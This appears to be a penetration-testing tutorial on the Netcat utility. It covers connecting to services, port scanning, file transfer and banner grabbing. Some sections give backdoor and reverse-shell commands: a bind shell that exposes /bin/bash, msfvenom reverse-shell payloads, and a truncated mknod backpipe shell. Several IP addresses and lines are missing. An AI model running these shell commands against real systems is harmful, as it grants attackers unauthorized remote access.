This article will provide you
with the basic guide of Netcat and how to get a session from it using different
Table of Contents:
Getting start with NC
Connecting to a Server
Fetching HTTP header
Creating a Backdoor
Verbose Mode
Save Output to Disk
Port Scanning
TCP Delay Scan
UDP Scan
Reverse TCP Shell Exploitation
Randomize Port
File Transfer
Reverse Netcat Shell Exploitation
Banner grabbing
Introduction to Netcat
Netcat or nc is a utility tool
that uses TCP and UDP connections to read and write in a network. It can be
used for both attacking and security. In case of attacking, it can be driven by
scripts which makes it quite dependable back-end. and if we talk about
security, it helps us to debug the network along with investing it.
Act as a simple TCP/UDP/SCTP/SSL client for
interacting with web servers, telnet servers, mail servers, and other TCP/IP
network services. Often the best way to understand a service (for fixing
problems, finding security flaws, or testing custom commands) is to interact
with it using Netcat. This lets you you control every character sent and view
the raw, unfiltered responses.
Redirect or proxy TCP/UDP/SCTP traffic to other
ports or hosts. This can be done using simple redirection (everything sent to a
port is automatically relayed somewhere else you specify in advance) or by
acting as a SOCKS or HTTP proxy so clients specify their own destinations. In
client mode, Netcat can connect to destinations through a chain of anonymous or
authenticated proxies.
Run on all major operating systems. We
distribute Linux, Windows, and Mac OS X binaries, and Netcat compiles on most
other systems. A trusted tool must be available whenever you need it, no matter
what computer you're using.
Encrypt communication with SSL, and transport it
over IPv4 or IPv6.
Act as a network gateway for execution of system
commands, with I/O redirected to the network. It was designed to work like the
Unix utility cat, but for the network.
Act as a connection broker, allowing two (or far
more) clients to connect to each other through a third (brokering) server. This
enables multiple machines hidden behind NAT gateways to communicate with each
other, and also enables the simple Netcat chat mode.
Getting start with NC
To start NC, the most basic
option we can use the help command. This will show us all the options that we
can use with Netcat. The help command is the following one :
nc -h
Connecting to a Server
Here, we have connected FTP
Server with the IP Address To connect to the server at specific
port where a particular service running. In our case the port is 21 i.e. FTP.
Syntax: nc [Target IP Address] [Target Port]
nc 21
As we can see in the given image,
we have vsFTPd installed on the server, and after giving the Login credentials
we have successfully logged in the FTP Server.
We can use netcat to fetch the
information about any webserver. Let’s get back to the server we connected to
earlier. It also has HTTP service running on port 80. So, we connected to HTTP
service using netcat as we did earlier. Now after connecting to the server we
use the option that will give us the header along with the source code of the
HTTP service running on the remote server.
nc 80
As we can see in the given
image that the header and source code is displayed through the netcat
Netcat can also be used to chat
between two users. We need to establish a connection before chatting. To do
this we are going to need two devices. One will play the role of initiator and
one will be a listener to start the conversation and so once the connection is
established, communication can be done from both ends. Here we are going to
create a scenario of chatting between two users with different operating
User 1
OS: Windows 10
IP Address:
Role: Listener
User 2
OS: Kali Linux
IP Address:
Role: Initiator
Now in each and every
scenario, regarding netcat. This step is prominent. First we will have to
create a listener. We will use following command to create a listener:
nc -lvvp 4444
[-l]: Listen Mode
[vv]: Verbose Mode {It can be used once, but we use twice to be
more verbose}
[p]: Local Port
Now, it’s time to create an initiator,
for this we will just provide the IP Address of the System where we started the
Listener followed by the port number.
NOTE: Use the same port to create
an initiator which was used in creating listener
nc 4444
Creating a Backdoor
We can also create a backdoor
using NC. To create a backdoor on the target system that we can come back to at
any time. Command for attacking a Linux System.
nc -l -p 2222 -e /bin/bash
This will open a listener on the
system that will pipe the command shell or the Linux bash shell to the
connecting system.
nc 2222
Verbose Mode
In netcat, Verbose is a mode
which can be initiated using [-v] parameter. Now verbose mode generates
extended information. Basically, we will connect to a server using netcat two
times to see the difference between normal and verbose mode. In the image give below,
we can see that when we add [-v] to the netcat command it displays the
information about the process that its performance while connecting to the
nc 21 -v
Save Output to Disk
For the purpose of the record
maintenance, better readability and future references, we will save the output
of the Netcat. To do this we will use the parameter -o of the Netcat to save
the output in the text file.
nc 21 -v -o /root/output.txt
Now that we have successfully
executed the command, now let’s traverse to the location to ensure whether the
output has been saved on the file or not. In this case, our location for output
is /root /output.txt.
Netcat can be used as a port
scanner although it was not designed to function as one. To work as a port scanner,
we use the [-z] parameter. It tells netcat to scan listing daemon without
sending any data. This makes it possible for netcat to understand the type of
service that is running on that specific port. Netcat can perform TCP and UDP
TCP Scan
nc -v -n -z -w 2 21-1100
[-v]: indicates Verbose mode
[-n]: indicates numeric-only IP addresses
[-z]: indicates zero -I/O mode [used for
[-w]: indicates timeout for connects and final
net reads
Also, to perform a port scan netcat
needs a range of port numbers. We can provide a range of ports to scan.
From the given image we can see
that the target machine has lots of ports open with various services running on
nc -v -n -z -w 2 21-1100
TCP Delay Scan
In order to not to be noisy in an
environment, it is recommended to use a delayed scan. Now to perform a delay
scan, we need to specify the delay. We will use the [-i] parameter to specify
the delay in sending next packet in seconds.
nc -z -v -i 10 21-80
UDP Scan
Netcat can scan the UDP ports in
a similar way it scanned the TCP ports. We are going to use [-u] parameter to
invoke the UDP mode.
nc -vzu 80-90
Reverse TCP Shell Exploitation
We can exploit a system using a
combination of msfvenom and netcat. We will use msfvenom to create a payload
and netcat to listen for the session. Firstly, we will have to create a
msfvenom -p windows/shell_reverse_tcp lhost= lport=2124 -f
exe > /root/Desktop/1.exe
We are using the
shell_reverse_tcp payload to get a session. We have provided with Local IP
address and port and then exported the script inside an Executable(exe) file.
Now we will create a listener using netcat on the port we provided during the
payload creation. We will now have to send the payload file to the target. When
the target will run the executable file, we will get a session on our netcat
nc -lvvp 2124
Randomize Port
If we can’t decide our very own
port to start listener or establish our Netcat connection. Well netcat has a
special -r parameter for us which gives us randomize local port.
nc -lv -r
File Transfer
Netcat can be used to transfer
file across devices. Here we will create a scenario where we will transfer a
file from a windows system to Kali Linux system. To send the file from the
Windows, we will use the following command.
nc -v -w 30 -p 8888 -l < C:\netcat\output.txt
Now we will have to receive the
file shared on Kali Linux. Here we will provide netcat with the Windows IP
Address and the port which hosts the file. And write the output inside a text
file. For doing this we will use the following command:
nc -v -w 2 8888 > output.txt
Reverse Netcat Shell Exploitation
We will use msfvenom to create a
payload and netcat to listen for the session. Firstly, we will have to create a
msfvenom -p cmd/unix/reverse_netcat lhost= lport=6666 R
So, when you execute the above
command; you will get another command that has to be run in the target system, as
shown in the image below, you will have your session as shown in the image
Another way to have a reverse
shell is by executing the following command in the target system :
mknod /tmp/backpipe p
/bin/sh 0
And then when you start netcat as
shown in the image below, you will have a session.
Banner grabbing
To grab the target port banner
from netcat, use the following command :
nc -v 22
So, this was a basic guide to
netcat. Its quite an interesting tool to use as well as it is pretty easy.
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